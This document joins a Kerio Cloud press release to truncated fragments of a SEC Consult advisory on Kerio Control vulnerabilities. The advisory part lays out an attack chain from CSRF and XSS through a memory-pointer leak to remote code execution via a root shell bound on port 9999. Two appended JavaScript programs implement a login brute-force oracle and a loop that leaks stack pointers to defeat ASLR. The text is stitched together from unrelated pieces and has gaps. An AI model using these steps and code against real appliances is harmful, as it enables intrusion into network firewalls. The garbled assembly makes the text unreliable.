Kerio Technologies have launched a new cloud service infrastructure for its partners and customers.

Although Kerio previously enabled its channel partners to host Kerio Connect on their own hardware using the SaaS model, this marks Kerio’s first major push into true, hosted infrastructure services.

The first Kerio Cloud offering will be the company’s flagship product, Kerio Connect 8, a messaging (email) and calendaring server. Unlike cloud email solutions such as Microsoft Office 365 or Google Apps, Kerio offers its customers a private cloud experience, which in turn allows them more control over their own data.

“Pundits have touted cloud services and predicted the demise of on-premise solutions for a few years now,” said Scott Schreiman, CEO, Kerio Technologies. “While customer data suggests that onsite servers are still very popular, we think Kerio Cloud is the most secure and flexible solution for the IT guy that is looking for an alternative, but is still evaluating the cloud. Our private cloud not only eliminates the need for partners to carry the hardware burden, it allows them to focus their energy on adding value instead of worrying about the availability of email services.”

The way it works: Kerio Cloud is a hosted infrastructure service that allows Kerio partners to resell Kerio “Software as a Service” to their end customers, eliminating the need to purchase and maintain their own server environments. Kerio will provide its partners with private virtual machines running Kerio Connect 8 in the cloud with some basic configuration.

SEC Consult has also released a blog post describing the attack scenarios of the vulnerabilities within this advisory in detail and a video which [...]

Exploit code has been developed as well but will [...]

b/2016/09/controlling-kerio-control-when-your.html

SEC Consult Vulnerability Lab Security Advisory

Title: Potential backdoor access through multiple vulnerabilities
Product: Kerio Control Unified Threat Management

Request excerpt:

```
Content-Type: application/x-www-form-urlencoded

k_securityHash=x&target=k_sessionVariable&k_variable=lastDisplayed&k_value=a:18:
```

The above response contains a valid pointer (0xb59066a8). However, sometimes this pointer will point into a readable and writeable region behind a stack region. The target location always stores the same data. During the analysis no further effort was spent on analysing this behaviour.

The pointer will also be disclosed if the user is already logged out:

```
Server: Kerio Control Embedded Web Server

k_loginParams.k_nonauthToken = "0xb2ee208"
k_loginParams.k_loginType = "loginCommon"
```

The attack from the Internet to obtain a reverse shell on Kerio Control:

1) The attacker tricks a victim into visiting the attacker's malicious website.
2) The attacker's website uses the CSRF bypass and the identified XSS vulnerability to embed a malicious script inside the Kerio Control website.
3) The attacker's website iframes the Kerio Control website to trigger the [...]
4) The XSS payload runs on the same domain and can therefore send requests and read responses. This means the attacker can send requests to GetLoginType.js.php to obtain a memory pointer.
5) If the memory pointer is within a specific range (e.g. [...]) [...]. In such a case the RCE vulnerability can be used to crash and restart the server.
6) If the memory pointer points near a stack (highest nibble is 0xb), the pointer can be used to calculate the base address of a stack.
7) Now the attacker knows the location of a stack (all stacks are marked as [...]). He can now easily bypass ASLR and DEP.

8) Remote Code Execution as administrator

An attacker can create a malicious upgrade image with the following [...]. The image can be uploaded in the administrative web interface. This will bind a root shell on port 9999. The complete attack can also be conducted via the cross site scripting vulnerability described in this advisory (XSS in contentLoader.php).

9) Login not protected against brute-force attacks

Valid credentials can be obtained via a brute-force attack. It's enough to send a POST request to /internal/dologin.php with the parameters kerio_username and kerio_password set. A remote attacker can detect whether the credentials are correct without reading the response (the same-origin policy would not allow reading the response). This is possible because /internal/photo will only return a valid image if the user is currently logged in.
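The login oracle from 9) above, as an added example that is not code from the SEC Consult advisory or from Kerio. The "server" is a constructed stand-in for the two endpoints the advisory names (/internal/dologin.php and /internal/photo); the session-cookie handling, the sample account, the wordlist and the `maxFailures` lockout option are assumptions made for this example, the last one being the hardening the advisory reports as absent. The attacker side never reads a response body: it only learns whether an image element pointing at /internal/photo would fire onload or onerror, which is exactly why the same-origin policy does not protect the login.

```javascript
// Added example, not code from the SEC Consult advisory or from Kerio.
// Offline model of the section 9 login oracle: a constructed stand-in for
// /internal/dologin.php and /internal/photo, a "browser" that obeys the
// same-origin policy, and an attacker that only sees onload/onerror.
const crypto = require("crypto");

// Constructed sample account; the appliance's real user store is not on the page.
const ACCOUNTS = new Map([["admin", "Summer2016!"]]);

// A browser decides onload/onerror by trying to decode the body; the PNG
// signature is enough to stand in for "a valid image" here.
const PNG_MAGIC = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);

// Stand-in for Kerio Control. opts.maxFailures is an assumed hardening knob:
// with the default (Infinity) there is no lockout, as the advisory describes.
function createKerioStub(opts = {}) {
  const maxFailures = opts.maxFailures ?? Infinity;
  const sessions = new Set();   // session ids that are currently logged in
  const failures = new Map();   // username -> consecutive failed logins
  return {
    // POST /internal/dologin.php, body "kerio_username=...&kerio_password=..."
    dologin(body) {
      const p = new URLSearchParams(body);
      const user = p.get("kerio_username");
      const pass = p.get("kerio_password");
      if ((failures.get(user) || 0) >= maxFailures) {
        return { status: 429, setCookie: null };          // locked out (hardened variant only)
      }
      if (user !== null && ACCOUNTS.get(user) === pass) {
        failures.delete(user);
        const sid = crypto.randomBytes(16).toString("hex");
        sessions.add(sid);
        return { status: 302, setCookie: sid };
      }
      failures.set(user, (failures.get(user) || 0) + 1);
      return { status: 200, setCookie: null };            // login page again, no session
    },
    // GET /internal/photo: an image only for a logged-in session, otherwise
    // a body the browser cannot decode as an image.
    photo(cookie) {
      if (cookie !== null && sessions.has(cookie)) {
        return { contentType: "image/png", body: PNG_MAGIC };
      }
      return { contentType: "text/html", body: Buffer.from("<html>login required</html>") };
    },
  };
}

// The attacker's browser: it can send cross-origin requests and its cookie
// jar carries the session to the next request, but the same-origin policy
// hides both response bodies. The only observable is whether
// <img src="https://<kerio>/internal/photo"> fires onload or onerror.
function createBrowser(server) {
  let cookie = null;
  return {
    submitLoginForm(username, password) {
      const body = new URLSearchParams({ kerio_username: username, kerio_password: password }).toString();
      const res = server.dologin(body);
      if (res.setCookie) cookie = res.setCookie;
      // the response body is deliberately not returned: SOP blocks reading it
    },
    imageLoads() {
      const res = server.photo(cookie);
      return res.contentType.startsWith("image/") && res.body.subarray(0, 8).equals(PNG_MAGIC);
    },
    clearCookies() { cookie = null; },
  };
}

// Brute force a password list for one user using only the onload/onerror oracle.
function bruteForce(browser, username, candidates) {
  for (const password of candidates) {
    browser.clearCookies();                 // never reuse an earlier session
    browser.submitLoginForm(username, password);
    if (browser.imageLoads()) return password;
  }
  return null;
}

const CANDIDATES = ["password", "admin", "kerio", "Summer2016!", "letmein"]; // constructed list

// Same wordlist against the unprotected stub and against one with a 3-failure lockout.
function demo() {
  return {
    unprotected: bruteForce(createBrowser(createKerioStub()), "admin", CANDIDATES),
    lockedOut: bruteForce(createBrowser(createKerioStub({ maxFailures: 3 })), "admin", CANDIDATES),
  };
}
```

In a real browser the two steps of `submitLoginForm` and `imageLoads` are a cross-site form POST (or a `fetch` with `mode: "no-cors"` and `credentials: "include"`) followed by `new Image()` with `onload`/`onerror` handlers; the stub keeps the same information boundary. The lockout variant shows the cheapest fix: once failed attempts are counted per account, the oracle still exists but the wordlist runs out of tries before it finds the password.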
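Steps 4 to 6 of the attack chain above, as an added example that is not code from the SEC Consult advisory. It parses the GetLoginType.js.php response format shown on the page, classifies the leaked pointer by its highest nibble, and loops through "crash, restart, leak again" until a pointer near a stack comes back. The two response bodies are constructed from the pointer values the advisory quotes; `STACK_OFFSET` is an invented illustration of a fixed offset an attacker would measure on a test appliance (the advisory only states that the target location always holds the same data), and treating every non-0xb pointer as "restart" is this example's simplification of the advisory's unspecified range check.

```javascript
// Added example, not code from the SEC Consult advisory.
// Steps 4-6: read the pointer out of GetLoginType.js.php, decide whether it
// is usable, and restart the service until it is.

// Constructed from the two pointer values quoted in the advisory.
const RESPONSE_LOGGED_OUT =
  'k_loginParams.k_nonauthToken = "0xb2ee208"\nk_loginParams.k_loginType = "loginCommon"\n';
const RESPONSE_NEAR_STACK =
  'k_loginParams.k_nonauthToken = "0xb59066a8"\nk_loginParams.k_loginType = "loginCommon"\n';

// Assumption for illustration only: the leaked object sits at a constant
// offset from the base of its stack. Not a value from the advisory.
const STACK_OFFSET = 0x66a8;

const TOKEN_RE = /k_loginParams\.k_nonauthToken\s*=\s*"(0x[0-9a-fA-F]+)"/;

// Step 4: the XSS payload runs on the Kerio Control origin, so it can read the
// body of GetLoginType.js.php and pull the pointer out of it.
function extractPointer(jsBody) {
  const m = TOKEN_RE.exec(jsBody);
  if (!m) throw new Error("k_nonauthToken not present in response");
  return parseInt(m[1], 16) >>> 0;   // 32-bit address, as the 8-digit values on the page are
}

// Steps 5-6: only a pointer whose highest nibble is 0xb lies near a stack;
// anything else is treated here as "restart the server and leak again"
// (the advisory's exact ranges are not reproduced on the page).
function classifyPointer(ptr) {
  return (ptr >>> 28) === 0xb ? "stack" : "restart";
}

// Step 6: derive the stack base from the leaked pointer and the assumed offset.
function stackBase(ptr) {
  return (ptr - STACK_OFFSET) >>> 0;
}

const hex = (n) => "0x" + n.toString(16).padStart(8, "0");

// The loop the payload would run: fetch, classify, and use the RCE bug to
// crash/restart the service until a usable pointer comes back. fetchLoginType
// and restartServer are callbacks so the logic runs offline here.
function leakStackPointer(fetchLoginType, restartServer, maxRounds = 5) {
  for (let round = 1; round <= maxRounds; round++) {
    const ptr = extractPointer(fetchLoginType());
    if (classifyPointer(ptr) === "stack") {
      return { ptr, base: stackBase(ptr), rounds: round };
    }
    restartServer();
  }
  return null;   // give up after maxRounds restarts
}

// Constructed sequence: first leak is the 0x0b2ee208 value, the second the 0xb59066a8 one.
function demo() {
  const responses = [RESPONSE_LOGGED_OUT, RESPONSE_NEAR_STACK];
  let restarts = 0;
  const leak = leakStackPointer(() => responses.shift(), () => { restarts++; });
  return { ...leak, restarts, ptrHex: hex(leak.ptr), baseHex: hex(leak.base) };
}
```

The nibble test is the whole of step 6 as the advisory states it: on a 32-bit Linux process the 0xbxxxxxxx range is where thread stacks and nearby mappings land, so a pointer there anchors the rest of the layout once the offset to a known object has been measured. Everything after that point (what gets written where) is not on the page and is not modelled here.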